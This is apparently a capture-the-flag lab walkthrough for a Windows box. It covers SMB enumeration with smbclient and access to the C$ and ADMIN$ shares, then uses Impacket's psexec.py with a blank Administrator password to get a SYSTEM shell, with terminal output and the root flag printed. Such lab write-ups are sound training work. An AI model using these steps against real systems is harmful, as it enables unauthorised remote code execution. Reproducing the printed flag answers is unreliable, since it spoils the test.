Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?
-PnBy default, when nmap performs host discovery, it
- sends an ICMP ping.
- checks if port 80 is open
- checks if port 443 is open.
If any of these three conditions are met, nmap considers the host to be up.
However, in many real-world scenarios, ICMP is often blocked, and ports 80 and 443 are closed. In such cases, nmap may incorrectly assume the host is dead and not proceed with port scanning.
To address this issue, you can use the -Pn switch to skip the host discovery process.
What does the 3-letter acronym SMB stand for?
Server Message BlockWhat port does SMB use to operate at?
445
What command line argument do you give to smbclient to list available shares?
-L
What character at the end of a share name indicates it’s an administrative share?
$
$ indicates it’s an administrative share.
-U switch for Login identity. Administrator is the high privilege standard account for Windows operating system.
Which Administrative share is accessible on the box that allows users to view the whole file system?
C$
What command can we use to download the files we find on the SMB Share?
get 1smb: \Users\Administrator\> cd Desktop\
2smb: \Users\Administrator\Desktop\> ls
3 . DR 0 Thu Apr 22 03:16:03 2021
4 .. DR 0 Thu Apr 22 03:16:03 2021
5 desktop.ini AHS 282 Wed Apr 21 11:23:32 2021
6 flag.txt A 32 Fri Apr 23 05:39:00 2021
7
8 3774463 blocks of size 4096. 1158389 blocks available
9
10smb: \Users\Administrator\Desktop\> get flag.txt
11getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?
psexec.pySince we can access this ADMIN$ share, we can try to use a tool called psexec.py to exploit this misconfiguration & get the interactive system shell. The psexec.py is part of the Impacket framework.
Impacket is a framework written in Python for working with network protocols. It is focused on providing low-level programmatic access to the packets and for some protocols. In short, Impacket contains dozens of amazing tools for interacting with Windows systems and applications, many of which are ideal for attacking Windows and Active Directory.
One of the most commonly used tools in Impacket is psexec.py. It is named after the utility, PsExec from Microsoft’s Sysinternals suite since it performs the same function of enabling us to execute a fully interactive shell on remote Windows machines.
How Impacket’s psexec works
Impacket creates a remote service by uploading a randomly-named executable on the ADMIN$ share on the remote system and then register it as a Windows service. This will result in having an interactive shell available on the remote Windows system via TCP port 445.
Psexec requires credentials for a user with local administrator privileges or higher since reading/writing to the ADMIN$ share is required. Once you successfully authenticate, it will drop you int a NT Authority\System shell.
installation guide
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txtThe syntax for simply getting an interactive shell from a target:
python psexec.py username:password@hostIP
We know that there is no password for the Administrator user. So, the command we are going to run is:
psexec.py administrator@10.129.208.116
1C:\> whoami
2nt authority\systemSubmit root flag
f751c19eda8f61ce81827e6930a1f40c 1┌──(kali㉿kali)-[~/Desktop/impacket]
2└─$ psexec.py administrator@10.129.208.116
3Impacket v0.12.0.dev1+20240725.125704.9f36a10e - Copyright 2023 Fortra
4
5Password:
6[*] Requesting shares on 10.129.208.116.....
7[*] Found writable share ADMIN$
8[*] Uploading file ckDQLGjh.exe
9[*] Opening SVCManager on 10.129.208.116.....
10[*] Creating service BjhK on 10.129.208.116.....
11[*] Starting service BjhK.....
12[!] Press help for extra shell commands
13Microsoft Windows [Version 10.0.17763.107]
14(c) 2018 Microsoft Corporation. All rights reserved.
15
16C:\Windows\system32> cd \
17
18C:\> dir *flag* /s
19 Volume in drive C has no label.
20 Volume Serial Number is EEE0-FCDB
21
22 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent
23
2404/23/2021 02:38 AM 551 flag.lnk
25 1 File(s) 551 bytes
26
27 Directory of C:\Users\Administrator\Desktop
28
2904/23/2021 02:39 AM 32 flag.txt
30 1 File(s) 32 bytes
31
32 Total Files Listed:
33 2 File(s) 583 bytes
34 0 Dir(s) 4,743,278,592 bytes free
35
36C:\> type C:\Users\Administrator\Desktop\flag.txt
37f751c19eda8f61ce81827e6930a1f40c